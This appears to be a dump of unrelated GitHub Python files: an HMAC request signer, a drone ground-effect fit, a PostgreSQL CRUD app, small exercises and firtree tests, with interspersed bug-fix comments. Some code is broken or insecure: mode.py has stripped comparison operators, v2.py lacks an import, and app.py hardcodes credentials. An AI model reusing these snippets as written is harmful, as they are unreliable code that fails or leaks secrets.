torch.cat(predicted_sentence, 0)\n return predicted_sentence","repo_name":"toyinogunlade/ImageCaptioning","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3123002990","text":"from .base_signer import BaseSigner, BaseResponseSigner\n\nimport base64\nimport collections\nimport hashlib\nimport hmac\nimport re\nimport time\n# from urllib import parse as urlparse\n\ntry:\n import urllib.parse as urlparse\n from urllib.parse import quote as urlquote\nexcept:\n import urlparse as urlparse\n from urllib import quote as urlquote\n\nclass 
V2Signer(BaseSigner):\n \"\"\"Implements a signer for the 2.0 version of the Acquia HTTP HMAC spec\n\n Reference: https://github.com/acquia/http-hmac-spec/tree/2.0\n \"\"\"\n\n def __init__(self, digest=hashlib.sha256):\n \"\"\"Initializes a V2Signer object.\n\n Keyword arguments:\n digest -- A callable which, when called, returns a hasher object.\n For example (and default value): hashlib.sha256\n \"\"\"\n super(V2Signer, self).__init__(digest)\n self.preset_time = None\n\n def signable(self, request, authheaders, bodyhash=None):\n \"\"\"Creates the signable string for a request and returns it.\n\n Keyword arguments:\n request -- A request object which can be consumed by this API.\n authheaders -- A string-indexable object which contains the headers appropriate for this signature version.\n bodyhash -- The hash for the body of the request. None if the request contains no body.\n This is expected for internal reasons, otherwise the body would be hashed multiple times, degrading performance.\n \"\"\"\n method = request.method.upper()\n host = request.get_header(\"host\")\n path = request.url.canonical_path()\n query = request.url.encoded_query()\n\n timestamp = request.get_header(\"x-authorization-timestamp\")\n auth_headers = self.unroll_auth_headers(authheaders, exclude_signature=True, sep='&', quote=False)\n base = '{0}\\n{1}\\n{2}\\n{3}\\n{4}'.format(method, host, path, query, auth_headers)\n\n cheaders = []\n cheaders_sign = '\\n'\n if \"headers\" in authheaders and authheaders[\"headers\"] != \"\":\n cheaders = authheaders[\"headers\"].split(\";\")\n cheaders.sort()\n for cheader in cheaders:\n cheaders_sign += '{0}: {1}\\n'.format(cheader.lower(), request.get_header(cheader))\n base += cheaders_sign\n base += '{0}'.format(timestamp)\n\n if bodyhash is not None:\n base += '\\n{0}\\n{1}'.format(request.get_header('content-type'), bodyhash)\n\n return base\n\n def parse_auth_headers(self, authorization):\n \"\"\"Parses the authorization headers from the authorization header taken from a request.\n Returns a dict that is accepted by all other API functions which expect authorization headers in a dict format.\n parse_auth_headers(unroll_auth_headers(A)) should return a dict that is equal to A.\n\n Keyword arguments:\n authorization -- The authorization header of any request. The header must be in a format understood by v2.\n \"\"\"\n matches = re.findall(r'(\\w+)=\"(.*?)\"', authorization)\n return dict(matches)\n\n def sign(self, request, authheaders, secret):\n \"\"\"Returns the v2 signature appropriate for the request. 
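# -- editor note (model.py, previous record): DecoderRNN.init_weights is
# declared as init_weights(m) but invoked as self.init_weights(), so m is
# bound to the DecoderRNN itself and neither branch fires; it also uses `I`
# (torch.nn.init) without importing it. Net effect: the custom init silently
# does nothing. A working sketch -- apply with decoder.apply(init_weights):
import torch.nn as nn
import torch.nn.init as I

def init_weights(module):
    """Xavier-init Linear/Conv2d submodules; use via model.apply(...)."""
    if isinstance(module, (nn.Linear, nn.Conv2d)):
        I.xavier_uniform_(module.weight)
        if module.bias is not None:
            module.bias.data.fill_(0.01)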
The request is not changed by this function.\n\n Keyword arguments:\n request -- A request object which can be consumed by this API.\n authheaders -- A string-indexable object which contains the headers appropriate for this signature version.\n secret -- The base64-encoded secret key for the HMAC authorization.\n \"\"\"\n if \"id\" not in authheaders or authheaders[\"id\"] == '':\n raise KeyError(\"id required in authorization headers.\")\n if \"nonce\" not in authheaders or authheaders[\"nonce\"] == '':\n raise KeyError(\"nonce required in authorization headers.\")\n if \"realm\" not in authheaders or authheaders[\"realm\"] == '':\n raise KeyError(\"realm required in authorization headers.\")\n if request.get_header('x-authorization-timestamp') == '':\n raise KeyError(\"X-Authorization-Timestamp is required.\")\n bodyhash = None\n if request.body is not None and request.body != b'':\n sha256 = hashlib.sha256()\n sha256.update(request.body)\n bodyhash = base64.b64encode(sha256.digest()).decode('utf-8')\n\n try:\n mac = hmac.HMAC(base64.b64decode(secret.encode('utf-8'), validate=True), digestmod=self.digest)\n except TypeError:\n s = secret.encode('utf-8')\n if not re.match(b'^[A-Za-z0-9+/]*={0,2}$', s):\n raise binascii.Error('Non-base64 digit found')\n mac = hmac.HMAC(base64.b64decode(s), digestmod=self.digest)\n mac.update(self.signable(request, authheaders, bodyhash).encode('utf-8'))\n digest = mac.digest()\n return base64.b64encode(digest).decode('utf-8')\n\n def get_response_signer(self):\n \"\"\"Returns the response signer for this version of the signature.\n \"\"\"\n if not hasattr(self, \"response_signer\"):\n self.response_signer = V2ResponseSigner(self.digest, orig=self)\n return self.response_signer\n\n def matches(self, header):\n \"\"\"Returns True if the provided authorization header matches the format expected by this signer.\n\n Keyword arguments:\n header -- A string representing the authorization header of a request.\n \"\"\"\n if re.match(r'(?i)^\\s*acquia-http-hmac.*?version=\\\"2\\.0\\\".*?$', header) is not None:\n return True\n return False\n\n def check(self, request, secret):\n \"\"\"Verifies whether or not the request bears an authorization appropriate and valid for this version of the signature.\n This verifies every element of the signature, including the timestamp's value.\n Does not alter the request.\n\n Keyword arguments:\n request -- A request object which can be consumed by this API.\n secret -- The base64-encoded secret key for the HMAC authorization.\n \"\"\"\n if request.get_header(\"Authorization\") == \"\":\n return False\n ah = self.parse_auth_headers(request.get_header(\"Authorization\"))\n if \"signature\" not in ah:\n return False\n if request.get_header('x-authorization-timestamp') == '':\n raise KeyError(\"X-Authorization-Timestamp is required.\")\n timestamp = int(float(request.get_header('x-authorization-timestamp')))\n if timestamp == 0:\n raise ValueError(\"X-Authorization-Timestamp must be a valid, non-zero timestamp.\")\n if self.preset_time is None:\n curr_time = time.time()\n else:\n curr_time = self.preset_time\n if timestamp > curr_time + 900:\n raise ValueError(\"X-Authorization-Timestamp is too far in the future.\")\n if timestamp < curr_time - 900:\n raise ValueError(\"X-Authorization-Timestamp is too far in the past.\")\n if request.body is not None and request.body != b'':\n content_hash = request.get_header(\"x-authorization-content-sha256\")\n if content_hash == '':\n raise KeyError(\"X-Authorization-Content-SHA256 is required 
for requests with a request body.\")\n sha256 = hashlib.sha256()\n sha256.update(request.body)\n if content_hash != base64.b64encode(sha256.digest()).decode('utf-8'):\n raise ValueError(\"X-Authorization-Content-SHA256 must match the SHA-256 hash of the request body.\")\n return ah[\"signature\"] == self.sign(request, ah, secret)\n\n def unroll_auth_headers(self, authheaders, exclude_signature=False, sep=\",\", quote=True):\n \"\"\"Converts an authorization header dict-like object into a string representing the authorization.\n\n Keyword arguments:\n authheaders -- A string-indexable object which contains the headers appropriate for this signature version.\n \"\"\"\n res = \"\"\n ordered = collections.OrderedDict(sorted(authheaders.items()))\n form = '{0}=\\\"{1}\\\"' if quote else '{0}={1}'\n if exclude_signature:\n return sep.join([form.format(k, urlquote(str(v), safe='')) for k, v in ordered.items() if k != 'signature'])\n else:\n return sep.join([form.format(k, urlquote(str(v), safe='') if k != 'signature' else str(v)) for k, v in ordered.items()])\n # legacy bad code\n # for k, v in ordered.items():\n # if res != \"\":\n # res += \",\"\n # value = str(v)\n # if k != \"signature\":\n # value = urlquote(str(v), safe='')\n # res += \"{0}=\\\"{1}\\\"\".format(k, value)\n # return res\n\n def sign_direct(self, request, authheaders, secret):\n \"\"\"Signs a request directly with a v2 signature. The request's Authorization header will change.\n This function may also add the required X-Authorization-Timestamp and X-Authorization-Content-SHA256 headers.\n\n Keyword arguments:\n request -- A request object which can be consumed by this API.\n authheaders -- A string-indexable object which contains the headers appropriate for this signature version.\n secret -- The base64-encoded secret key for the HMAC authorization.\n \"\"\"\n if request.get_header('x-authorization-timestamp') == '':\n request.with_header(\"X-Authorization-Timestamp\", str(time.time()))\n if request.body is not None and request.body != b'':\n if request.get_header(\"x-authorization-content-sha256\") == '':\n sha256 = hashlib.sha256()\n sha256.update(request.body)\n request.with_header(\"X-Authorization-Content-SHA256\", base64.b64encode(sha256.digest()).decode('utf-8'))\n sig = self.sign(request, authheaders, secret)\n authheaders[\"signature\"] = sig\n return request.with_header(\"Authorization\", \"acquia-http-hmac {0}\".format(self.unroll_auth_headers(authheaders)))\n\n\nclass V2ResponseSigner(BaseResponseSigner):\n def __init__(self, digest=hashlib.sha256, orig=None):\n \"\"\"Initializes a V2ResponseSigner object\n\n Keyword arguments:\n digest -- A callable which, when called, returns a hasher object.\n For example (and default value): hashlib.sha256\n orig -- A V2Signer object whose get_response_signer() returns this object.\n If None is provided, one such object is created internally.\n \"\"\"\n super(V2ResponseSigner, self).__init__(digest)\n if orig is None:\n self.orig = V2Signer(digest)\n self.orig.response_signer = self\n else:\n self.orig = orig\n\n def check(self, request, response, secret):\n \"\"\"Checks the response for the appropriate signature. 
Returns True if the signature matches the expected value.\n\n Keyword arguments:\n request -- A request object which can be consumed by this API.\n response -- A requests response object or compatible signed response object.\n secret -- The base64-encoded secret key for the HMAC authorization.\n \"\"\"\n auth = request.get_header('Authorization')\n if auth == '':\n raise KeyError('Authorization header is required for the request.')\n ah = self.orig.parse_auth_headers(auth)\n act = response.headers['X-Server-Authorization-HMAC-SHA256']\n if act == '':\n raise KeyError('Response is missing the signature header X-Server-Authorization-HMAC-SHA256.')\n sig = self.sign(request, ah, response.text, secret)\n return sig == act\n\n def signable(self, request, authheaders, response_body):\n \"\"\"Creates the signable string for a response and returns it.\n\n Keyword arguments:\n request -- A request object which can be consumed by this API.\n authheaders -- A string-indexable object which contains the headers appropriate for this signature version.\n response_body -- A string or bytes-like object which represents the body of the response.\n \"\"\"\n nonce = authheaders[\"nonce\"]\n timestamp = request.get_header(\"x-authorization-timestamp\")\n try:\n body_str = response_body.decode('utf-8')\n except:\n body_str = response_body\n return '{0}\\n{1}\\n{2}'.format(nonce, timestamp, body_str)\n\n def sign(self, request, authheaders, response_body, secret):\n \"\"\"Returns the response signature for the response to the request.\n\n Keyword arguments:\n request -- A request object which can be consumed by this API.\n authheaders -- A string-indexable object which contains the headers appropriate for this signature version.\n response_body -- A string or bytes-like object which represents the body of the response.\n secret -- The base64-encoded secret key for the HMAC authorization.\n \"\"\"\n if \"nonce\" not in authheaders or authheaders[\"nonce\"] == '':\n raise KeyError(\"nonce required in authorization headers.\")\n if request.get_header('x-authorization-timestamp') == '':\n raise KeyError(\"X-Authorization-Timestamp is required.\")\n\n try:\n mac = hmac.HMAC(base64.b64decode(secret.encode('utf-8'), validate=True), digestmod=self.digest)\n except TypeError:\n s = secret.encode('utf-8')\n if not re.match(b'^[A-Za-z0-9+/]*={0,2}$', s):\n raise binascii.Error('Non-base64 digit found')\n mac = hmac.HMAC(base64.b64decode(s), digestmod=self.digest)\n mac.update(self.signable(request, authheaders, response_body).encode('utf-8'))\n digest = mac.digest()\n return base64.b64encode(digest).decode('utf-8')\n","repo_name":"baliame/http-hmac-python","sub_path":"httphmac/v2.py","file_name":"v2.py","file_ext":"py","file_size_in_byte":13659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71515388054","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy.signal import savgol_filter\nfrom scipy.spatial.transform import Rotation as R\nfrom scipy.optimize import curve_fit\n\n# paths\npath = \"../log/traj_log.csv\" # data of hovering on multiple altitudes for T_IGE\n# data of simple hovering on one altitude for T_OGE\nhover_path = \"../log/hover_log.csv\"\n\n# initialize plot\nfig = plt.figure(figsize=(20, 8)) # xyz plot\nax = fig.add_subplot(111)\nplt.xticks(fontsize=20)\nplt.yticks(fontsize=20)\n\n# rpm-thrust relation (either from datasheet or experimental)\n\n\ndef rpmToThrust(rpm):\n return 
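# -- editor note (v2.py, above): both V2Signer.sign() and the response
# signer catch TypeError and then `raise binascii.Error(...)`, but binascii
# is never imported, so that fallback path dies with NameError instead. A
# self-contained sketch of the secret-decoding step with the import present:
import base64
import binascii
import hashlib
import hmac

def hmac_b64(secret, payload):
    """HMAC-SHA256 `payload` with a base64 secret; returns base64 text."""
    try:
        key = base64.b64decode(secret.encode("utf-8"), validate=True)
    except binascii.Error:
        raise ValueError("secret is not valid base64")
    return base64.b64encode(
        hmac.new(key, payload.encode("utf-8"), hashlib.sha256).digest()
    ).decode("utf-8")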
1.1382941*(10**-7)*np.square(rpm)\n\n\n# read in data\nheaderList = [\"t\", \"x\", \"y\", \"z\", \"vx\", \"vy\", \"vz\", \"ro\", \"pi\", \"ya\", \"vro\", \"vpi\", \"vya\", \"rpm1\",\n \"rpm2\", \"rpm3\", \"rpm4\", \"volt1\", \"volt2\", \"volt3\", \"volt4\", \"amp1\", \"amp2\", \"amp3\", \"amp4\"]\ntime = pd.read_csv(path, usecols=[\n \"t\"], names=headerList).to_numpy()\npos = pd.read_csv(path, usecols=[\n \"x\", \"y\", \"z\"], names=headerList).to_numpy()\nrpm = pd.read_csv(\n path, usecols=[\"rpm1\", \"rpm2\", \"rpm3\", \"rpm4\"], names=headerList).to_numpy()\n\n# determine signal length\nsignal_length = np.shape(time)[0]\n\n# find out of ground effect (OGE) thrust\nrpm_cal = pd.read_csv(\n hover_path, usecols=[\"rpm1\", \"rpm2\", \"rpm3\", \"rpm4\"], names=headerList).to_numpy()\nthrust_cal = np.sum(rpmToThrust(rpm_cal), axis=1) # - mass*g\nT_oge = np.average(thrust_cal)\n\n# remove nan's\npos = np.nan_to_num(pos, copy=True, nan=0.0) # [m]\nrpm = np.nan_to_num(rpm, copy=True, nan=0.0) # [1/min]\n\n# filter data (if result is unsatisfying, the savgol-windows might need adjustment)\nfor i in range(2):\n pos[:, i] = savgol_filter(pos[:, i], 50, 3)\nfor i in range(3):\n rpm[:, i] = savgol_filter(rpm[:, i], 500, 3)\n\n# rpm to thrust (according to relation)\nT_motor_real = rpmToThrust(rpm)\n\n# sum up the thrust over all motors\nT_ige = np.sum(T_motor_real, axis=1)\n\n\ncut_front = 2000\ncut_back = 1000\n\n# plot data\nax.plot(pos[cut_front:signal_length-cut_back, 2], T_oge/T_ige[cut_front:signal_length-cut_back],\n color=\"blue\", label=\"flight data\")\n\n# perform data regression\nx_data = pos[cut_front:signal_length-cut_back, 2]\ny_data = T_oge/T_ige[cut_front:signal_length-cut_back]\n\n# ansatz function\n\n\ndef f_ansatz(x, a, b, c):\n return a * np.exp(- b * x) + c\n\n\npopt, pcov = curve_fit(f_ansatz, x_data, y_data)\nprint(popt)\n\n# plot fit\nplt.plot(x_data, f_ansatz(x_data, *popt), 'r-',\n label='fit: %5.3f*exp(-%5.3f*z)+ %5.3f' % tuple(popt))\n\nax.set_xlabel(\"z [m]\", fontsize=20)\nax.set_ylabel(\"$T_{IGE}$ / $T_{OGE}$ [s]\", fontsize=20)\nplt.legend(prop={'size': 20})\nplt.savefig(\"static_compensator.svg\")\nplt.savefig(\"static_compensator.pdf\")\nplt.show()\n","repo_name":"aurelappius/quadcopter-groundeffect-control","sub_path":"flight_analysis/ground_effect_model.py","file_name":"ground_effect_model.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10112123258","text":"import psycopg2\r\nconn = None\r\ntry:\r\n while conn == None:\r\n try:\r\n conn = psycopg2.connect(\r\n user='mkrawiec',\r\n password='password',\r\n host='10.0.10.3',\r\n port='5432',\r\n database='mkrawiec_db',\r\n ) \r\n except:\r\n continue\r\nexcept:\r\n pass\r\nprint(\"Połączono\\n\")\r\ncur = conn.cursor()\r\nimie_1 = \"Jan\"\r\nnazwisko_1 = \"Kowalski\"\r\nimie_2 = \"Adam\"\r\nnazwisko_2 = \"Malinowski\"\r\nimie_3 = \"Zbigniew\"\r\nnazwisko_3 = \"Wodecki\"\r\ntable = False\r\ntry:\r\n while table == False:\r\n try:\r\n create_table = 'CREATE TABLE IF NOT EXISTS \"Uzytkownicy\" (id SERIAL PRIMARY KEY, \"Imie\" varchar(30) NOT NULL, \"Nazwisko\" varchar(30) NOT NULL);'\r\n select = 'SELECT * FROM \"Uzytkownicy\";'\r\n cur.execute(create_table)\r\n conn.commit()\r\n table = True\r\n except:\r\n continue\r\nexcept:\r\n print(\"error\")\r\nprint(\"Utworzono tabele\\n\")\r\ntry: \r\n cur.execute('INSERT INTO \"Uzytkownicy\" (\"Imie\", \"Nazwisko\") VALUES (%s, %s);', (imie_1, nazwisko_1))\r\n 
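# -- editor note (ground_effect_model.py, above): the fitted ansatz gives
# T_OGE/T_IGE = a*exp(-b*z) + c, so the model can be inverted into a static
# compensator: divide the free-air hover command by the predicted ratio at
# altitude z. A hedged sketch, assuming popt = (a, b, c) from the curve_fit
# in that script (the divide direction follows from y_data = T_oge/T_ige):
import numpy as np

def in_ground_effect_thrust(t_oge, z, a, b, c):
    """Thrust to command at altitude z [m] for the same lift as t_oge."""
    return t_oge / (a * np.exp(-b * z) + c)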
conn.commit()\r\n cur.execute('INSERT INTO \"Uzytkownicy\" (\"Imie\", \"Nazwisko\") VALUES (%s, %s);', (imie_2, nazwisko_2))\r\n conn.commit()\r\n cur.execute('INSERT INTO \"Uzytkownicy\" (\"Imie\", \"Nazwisko\") VALUES (%s, %s);', (imie_3, nazwisko_3))\r\n conn.commit()\r\n print(\"Dodano 3 rekordy do bazy\\n\")\r\nexcept:\r\n print(\"error\")\r\nnumber = '0'\r\nwhile number!=5:\r\n print(\"1 - dodaj uzytkownika 2 - usun uzytkownika 3-aktualizuj dane uzytkownika 4-wyswietl uzytkownikow 5-koniec\")\r\n number = int(input())\r\n \r\n if number == 1:\r\n try:\r\n imie = input(\"Imie: \")\r\n nazwisko = input(\"Nazwisko: \")\r\n cur.execute('INSERT INTO \"Uzytkownicy\" (\"Imie\", \"Nazwisko\") VALUES (%s, %s);',(imie, nazwisko))\r\n conn.commit()\r\n print(\"Dodano uzytkownika\\n\")\r\n except: \r\n print(\"error\")\r\n elif number == 2:\r\n try:\r\n id = input(\"Id uzytkownika: \")\r\n cur.execute('DELETE FROM \"Uzytkownicy\" WHERE id=%s;', id)\r\n conn.commit()\r\n print(\"Usunieto uzytkownika o id = %s\",id)\r\n except:\r\n print(\"error\")\r\n \r\n elif number ==3:\r\n try:\r\n id = input(\"Id uzytkownika: \")\r\n imie = input(\"Nowe imie: \")\r\n nazwisko = input(\"Nowe nazwisko: \")\r\n cur.execute('UPDATE \"Uzytkownicy\" SET \"Imie\"=%s, \"Nazwisko\"=%s WHERE id=%s;', (imie, nazwisko, id))\r\n conn.commit()\r\n print(\"Zaktualizowano dane uzytkownikao id = %s\",id)\r\n except: \r\n print(\"error\")\r\n elif number == 4:\r\n try:\r\n cur.execute(select)\r\n users = cur.fetchall()\r\n for u in users:\r\n print(\"Id = \", u[0], )\r\n print(\"Imie = \", u[1])\r\n print(\"Nazwisko = \", u[2], \"\\n\")\r\n except: \r\n print(\"error\")\r\n\r\ncur.close()\r\nconn.close()\r\n","repo_name":"Kominiarz97/compose_python_postgresql","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8008309161","text":"#!/usr/local/bin/python\n\nimport bisect\nimport math\nimport sys\n\nsys.path.append(\"/Users/khmacdonald/code/SVN/trunk/euler/utilities/\")\nfrom primes import sieve\n\n\nav = sys.argv\nac = len(av)\n\ndef proj():\n idx = 2\n x = 1\n mx = 100000\n s = sieve(mx)\n tot, pcnt = 1, 0\n stop = False\n while not stop:\n for k in range(4):\n x = x+idx\n tot = tot + 1\n if s.is_prime(x):\n pcnt = pcnt+1\n p = float(pcnt)/float(tot)\n if p<0.1:\n print(\"pcnt = %d, tot = %d, idx = %d\" % (pcnt,tot,idx))\n stop = True\n break\n idx = idx + 2\n\nif __name__=='__main__':\n proj()\n\n","repo_name":"khmacdonald/Misc","sub_path":"euler/p0058.py","file_name":"p0058.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33733494772","text":"import csv\r\nfrom collections import Counter\r\nwith open('SOCR-HeightWeight.csv', newline = '') as mode:\r\n reader = csv.reader(mode)\r\n fileData = list(reader)\r\n\r\nfileData.pop(0)\r\nnewData=[]\r\n\r\nfor i in range(len(fileData)):\r\n num = fileData[i][1]\r\n newData.append(float(num))\r\n\r\nCounterData = Counter(newData)\r\nrange = {\"50-60\":0,\"60-70\":0,\"70-80\":0}\r\n\r\nfor height, occurence in CounterData.items():\r\n if 50 modeOccurence:\r\n modeRange, modeOccurence = [int(range.split(\"-\")[0]),int(range.split(\"-\")[1])], occurence\r\n\r\nm = 
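# -- editor note (app.py, above): cur.execute('... WHERE id=%s;', id) passes
# a bare string where psycopg2 expects a sequence of parameters; a str *is*
# a sequence, so this works only for one-character ids and otherwise fails
# with "not all arguments converted". Wrap single parameters in a tuple:
def delete_user(conn, user_id):
    """Parameterized delete; note the one-element tuple (user_id,)."""
    with conn.cursor() as cur:
        cur.execute('DELETE FROM "Uzytkownicy" WHERE id=%s;', (user_id,))
    conn.commit()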
float((modeRange[0]+modeRange[1])/2)\r\nprint(m)","repo_name":"Suchet-13/P-104","sub_path":"mode.py","file_name":"mode.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11154670351","text":"# Read a file which includes at least two paragraphs.\n# Calculate the word frequency for each word in the file. The steps to do so are:\n# 1. Split the words in the file\n# 2. Use a loop to iterate over the words.\n# 3. Add the first word to the file, put the value 1\n# 4. Add the second word to the file, put the value 1.\n# 5. If you faced with a word that you have already added to the file, just update the value\n# 6. Finally, you will have a file which includes all the words with their counts,\n# ex: {“Is”: 5, “politics”:3, “country”:1, ...}\n\nfileName = input(\"What file are the paragraphs in?: \")\ninfile = open(fileName, 'r')\nline = infile.readline()\nlistOfWords = []\nfreqOfWords = []\nwhile line != \"\":\n line = line.strip()\n listOfWords.extend(line.split(\" \"))\n line = infile.readline()\nfor w in listOfWords:\n freqOfWords.append(listOfWords.count(w))\nnewList = list(zip(listOfWords, freqOfWords))\nfinalList = set(newList)\nprint(finalList)\nprint(newList)\n","repo_name":"eldq5d/UMKC-490-Python","sub_path":"Lab1/Task1.py","file_name":"Task1.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31845838379","text":"import unittest\nimport gobject\nimport cairo\nfrom pyfirtree import *\n\nclass SimpleReduce(unittest.TestCase):\n def setUp(self):\n self._k = Kernel()\n self.assertNotEqual(self._k, None)\n src = \"\"\"\n kernel __reduce void simpleKernel(static sampler src) {\n vec4 incol = sample(src, samplerCoord(src));\n if(incol.r > 0.5) {\n emit(vec4(destCoord(), 1, 0));\n }\n if(incol.g > 0.5) {\n emit(vec4(destCoord(), 2, 0));\n }\n }\n \"\"\"\n self._k.compile_from_source(src)\n\n log = self._k.get_compile_log()\n if len(log) != 0:\n print('\\n'.join(log))\n\n source_surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, 320, 240)\n cr = cairo.Context(source_surface)\n cr.set_source_rgba(0,0,1,1)\n cr.paint()\n\n cr.set_source_rgba(1,0,0,1)\n cr.move_to(0,0)\n cr.line_to(160,0)\n cr.line_to(160,240)\n cr.line_to(0,240)\n cr.line_to(0,0)\n cr.fill()\n\n # Source has 160x240 == 38400 red pixels\n\n cr.set_source_rgba(0,1,0,1)\n cr.move_to(180,10)\n cr.line_to(200,10)\n cr.line_to(200,20)\n cr.line_to(180,20)\n cr.line_to(180,10)\n cr.fill()\n\n # Source has 20x10 == 200 green pixels\n\n s = CairoSurfaceSampler()\n s.set_cairo_surface(source_surface)\n self._k['src'] = s\n\n def tearDown(self):\n self._k = None\n\n def testDebug(self):\n #print(debug_dump_kernel_function(self._k))\n self.assertNotEqual(debug_dump_kernel_function(self._k), None)\n\n def testValidity(self):\n self.assertEqual(self._k.is_valid(), True)\n\n def testTarget(self):\n self.assertEqual(self._k.get_target(), KERNEL_TARGET_REDUCE)\n\n def testCompileStatusMethod(self):\n self.assertEqual(self._k.get_compile_status(), True)\n\n def testCompileStatusProperty(self):\n self.assertEqual(self._k.get_property('compile-status'), True)\n\n def testCompileLog(self):\n log = self._k.get_compile_log()\n if len(log) != 0:\n print('\\n'.join(log))\n self.assertNotEqual(log, None)\n self.assertEqual(len(log), 0)\n\n def testEngine(self):\n engine = CpuReduceEngine()\n self.assertEqual(engine.get_kernel(), None)\n 
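# -- editor note (mode.py, above): the comparison operators in that record
# appear to have been eaten by HTML-style stripping ("if 50 modeOccurence:"
# is not valid Python -- the spans between < and > are missing). A hedged
# reconstruction of the binned-mode computation it seems to implement:
def mode_bin_midpoint(heights):
    """Midpoint of the most populated height bin (bins as in the script)."""
    bins = {"50-60": 0, "60-70": 0, "70-80": 0}
    for h in heights:
        if 50 < h < 60:
            bins["50-60"] += 1
        elif 60 < h < 70:
            bins["60-70"] += 1
        elif 70 < h < 80:
            bins["70-80"] += 1
    lo, hi = (int(x) for x in max(bins, key=bins.get).split("-"))
    return (lo + hi) / 2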
engine.set_kernel(self._k)\n self.assertEqual(engine.get_kernel(), self._k)\n\n def testReduce(self):\n engine = CpuReduceEngine()\n self.assertEqual(engine.get_kernel(), None)\n engine.set_kernel(self._k)\n self.assertEqual(engine.get_kernel(), self._k)\n output = engine.run((0,0,320,240),320,240)\n self.assertEqual(len(output), 38600)\n self.assertEqual(len(filter(lambda v: v[2] == 1, output)), 38400)\n self.assertEqual(len(filter(lambda v: v[2] == 2, output)), 200)\n self.assertEqual(len(filter(lambda v: (v[2] == 1) and (v[0] <= 160), output)), 38400)\n self.assertEqual(len(filter(lambda v: (v[2] == 1) and (v[0] > 160), output)), 0)\n self.assertEqual(len(filter(lambda v: (v[2] == 2) and (v[0] <= 200), output)), 200)\n self.assertEqual(len(filter(lambda v: (v[2] == 2) and (v[0] > 200), output)), 0)\n self.assertEqual(len(filter(lambda v: (v[2] == 2) and (v[1] <= 20), output)), 200)\n self.assertEqual(len(filter(lambda v: (v[2] == 2) and (v[1] > 20), output)), 0)\n self.assertEqual(len(filter(lambda v: (v[2] == 2) and (v[1] < 10), output)), 0)\n \n def testReduceAsm(self):\n engine = CpuReduceEngine()\n self.assertEqual(engine.get_kernel(), None)\n engine.set_kernel(self._k)\n self.assertEqual(engine.get_kernel(), self._k)\n asm = debug_dump_cpu_reduce_engine_asm(engine)\n self.assertNotEqual(asm, None)\n # print(asm)\n\n# vim:sw=4:ts=4:et:autoindent\n\n","repo_name":"rjw57/firtree","sub_path":"testing/core/reduce.py","file_name":"reduce.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"44289799828","text":"def translate_test():\n check = []\n input_string = input(\"Please input what you want to translate into english here, in lower case.\")\n English_dic = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't',\n 'u', 'v', 'w', 'x', 'y', 'z', ' ']\n trans = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',\n 'w', 'x', 'y', 'z', ' ']\n letter = list(input_string)\n print(letter)\n for i in letter:\n id = trans.index(i)\n translated = English_dic[id]\n check.append(translated)\n print(''.join(check))\ntranslate_test()","repo_name":"Chigzzer/Home_project_1","sub_path":"translater_test.py","file_name":"translater_test.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26926175388","text":"from tkinter import *\r\nroot = Tk()\r\nroot.title(\"Fibonacci\")\r\nroot.geometry(\"400x400\")\r\n\r\nlabel_series = Label(root, text = \"Fibonacci Series \")\r\nenter = Entry(root)\r\nlabel_sum = Label(root)\r\n\r\ndef Fibonacci():\r\n num = int(enter.get())\r\n fn = 0\r\n sn = 1\r\n sum = 0\r\n counter = 1\r\n while(counter <= num):\r\n label_series[\"text\"]+=str(sum)+\" \"\r\n counter = counter+1\r\n fn = sn\r\n sn = sum\r\n sum = fn+sn\r\n\r\n label_sum[\"text\"]=\"The sum is \"+str(sum)\r\n \r\nbtn = Button(root, text = \"Show Fibonacci Series\", command = Fibonacci)\r\n\r\nenter.pack()\r\nbtn.pack()\r\nlabel_series.pack()\r\nlabel_sum.pack()\r\n\r\nroot.mainloop()","repo_name":"TirthM89/Fibonacci_Sum","sub_path":"Fibonacci Sum.py","file_name":"Fibonacci Sum.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38324490874","text":"#\n# Probabilistic reasoning for sequential data: 
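# -- editor note (reduce.py, above): len(filter(...)) in testReduce only
# works on Python 2, where filter returns a list; on Python 3 it raises
# TypeError because filter yields an iterator. A version-agnostic counter:
def count_where(pred, output):
    """Count elements of `output` satisfying `pred`, without a temp list."""
    return sum(1 for v in output if pred(v))

# e.g. self.assertEqual(count_where(lambda v: v[2] == 1, output), 38400)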
